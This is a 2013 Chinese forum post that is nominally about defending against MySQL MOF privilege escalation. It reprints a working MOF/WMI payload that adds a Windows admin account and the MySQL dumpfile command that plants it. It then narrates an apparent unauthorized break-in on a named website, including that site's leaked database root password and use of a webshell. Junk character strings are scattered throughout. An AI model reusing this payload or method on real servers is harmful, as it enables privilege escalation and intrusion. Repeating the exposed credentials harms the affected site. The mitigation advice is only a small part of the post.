Mysql mof扩展漏洞防范方法, d" M# H# O# K! Y' ^; t* l; y
! N5 d$ G" w- f' i# b! k2 p* e
网上公开的一些利用代码:4 y) X, a! Q6 A h0 A% x2 _: X2 m
# [" [/ N/ v8 Z9 f; C2 T) I: s#pragma namespace(“\\\\.\\root\\subscription”)
^3 g- X8 t6 x8 v1 g0 N% ^
3 g3 }7 j' A) O$ U2 i' cinstance of __EventFilter as $EventFilter { EventNamespace = “Root\\Cimv2″; Name = “filtP2″; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2″; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user admin admin /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };, N9 G, D4 T8 \( i( H/ a
q8 p4 r# [3 {; R
3 P% n3 r, T% ^) u+ X* E3 x
+ A" p8 Y' q8 C- o: \5 g
" l) D3 d" J- }- f+ X) W0 {8 h4 u! c7 s/ W
连接mysql数据库后执行: select load_file(‘C:\\RECYCLER\\nullevt.mof’) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;5 U( W; a6 R7 j$ s$ s4 |- x
从上面代码来看得出解决办法:
) K; S4 h! l* Y5 }4 n2 z$ a# B2 I( p' U' u
1、mysql用户权限控制,禁止 “load_file”、”dumpfile”等函数
\/ a. I8 H+ g! h9 H4 I6 O" o
6 z5 `, a/ c& p' g. Y0 z2、禁止使用”WScript.Shel”组件( f% k) A0 J( o
5 B+ \4 A( ]$ r4 p0 X! w; x' k) [1 i7 ]
3、目录权限c:/windows/system32/wbem/mof/ 删除内置特殊组CREATOR OWNER0 c1 K# j0 r, g+ l0 }: ]
9 d; m) G& a8 ]: Y! ]当然上面是网上说的 感觉需要的权限很大 比如 root 还有mysql外链昨天碰到了就给大家演示下
7 w! j2 K% [, r- w* B! _# O- w
! l0 }5 Y( z7 l. h# F2 D5 f* U6 f事情是这样发生的 一机油在论坛提问我就看了下 发现已经有大牛搞下了 说是用是 mysql mof扩展提权; p$ [) o, j# Z: c& |1 U# D, v1 b
; x" Q) P- v3 @但是小菜发现没有听过于是赶紧去查资料学习…就有了上面的来着网上的内容
7 t- o) z! n4 B5 R, x& J+ u9 T3 u, A- m# I/ @# ?) ?/ p* P
看懂了后就开始练手吧# {" @3 Q# J2 A9 s2 X) a
1 e( g b+ Z' Y
http://www.webbmw.com/config/config_ucenter.php 一句话 a
( P b( q& b) s( }, M3 \
# p4 I! \/ C1 y, `. o+ ~$_config['db']['1']['dbhost'] = ‘localhost’; $_config['db']['1']['dbuser'] = ‘root’; $_config['db']['1']['dbpw'] = ‘tfr226206′; $_config['db']['1']['dbcharset'] = ‘gbk’; $_config['db']['1']['pconnect'] = ’0′; $_config['db']['1']['dbname'] = ‘webbmw’; $_config['db']['1']['tablepre'] = ‘pre_’; $_config['db']['common']['slave_except_table'] = ”; 有root密码啊。
" {$ a$ ~$ X2 j, o* _6 v( |* _/ J/ y1 [% G& Z9 R
于是直接用菜刀开搞
# \" M$ `$ D' O8 t0 j' D1 \+ }0 E5 V7 o% W
上马先! K' B5 L+ ~+ F7 }
p/ `( e5 H$ c. O' `1 o B0 M既然有了那些账号 之类的 于是我们就执行吧……./ V/ {0 |: t0 B! U- y; N1 O7 g
8 G0 e0 ]; G, }+ y& _
小小的说下5 W9 k/ l/ x! \
: p! R7 ^' e2 Q, W& I! w/ `' G
在这里第1次执行未成功 原因未知
1 F5 @: \5 `1 P3 Q$ z
# N) l, O( \0 z, o7 ]1 d我就猜想是否是因为我们执行的代码有问题 于是我就去我wooyun找的代码。5 o' C7 [% u; H6 j
4 b! d1 _1 {% M& h$ R+ W
#pragma namespace(“\\\\.\\root\\subscription”)" d! I* ]9 z7 g) S
F+ [1 w. O2 n5 Yinstance of __EventFilter as $EventFilter { EventNamespace = “Root\\Cimv2″; Name = “filtP2″; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2″; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user test test /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };2 e1 R. b8 c$ @; }3 B8 T1 R l
+ H1 d8 }% M% k5 [我是将文件放到C:\WINDOWS\temp\1.mof; p; L2 x) K* u) C
& H8 v) {& i8 k; \所以我们就改下执行的代码
2 y, w* n0 f7 U6 b3 @6 g; ~" Z: i) W P+ M9 ~
select load_file(‘C:\WINDOWS\temp\1.mof‘) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;( \4 m o; m7 \3 `# w
! u, S* Q3 B$ _3 a1 ~
2 }3 r) D! o1 E+ V' o7 ?* a) m
' g+ o; ~, _+ j+ T, a但是 你会发现账号还是没有躺在那里。。
& o" ?0 C9 P. @1 X; ?- g+ U, o
# R: @) B5 ^, @% G, }$ h2 u于是我就感觉蛋疼
; X! n3 P6 v; [, A8 W" b$ @$ R
( {0 H% x4 J! y: t# e0 `0 }! a就去一个一个去执行 但是执行到第2个 mysql时就成功了………
' X" Y& g6 M# `* N- f# b$ b- ^: n6 P: k9 j8 a, S
" m7 g6 H+ H% b2 O/ Y; o* j; P& Q5 [' I3 ^) S$ V
但是其他库均不成功…1 L4 B3 B" [& Z
* n4 Y) }* p7 B我就很费解呀 到底为什么不成功求大牛解答…% b# u5 B& Y4 f* r4 x; T6 X8 E: s
$ ]& D" f7 `) v* w+ |: `/ j/ J2 U K/ k0 W6 M. y) r# j7 ^) ^+ M$ e
4 M. R* L* o2 ^8 b7 d3 q
|
发表于 2013-1-4 19:49:49
收藏
支持
反对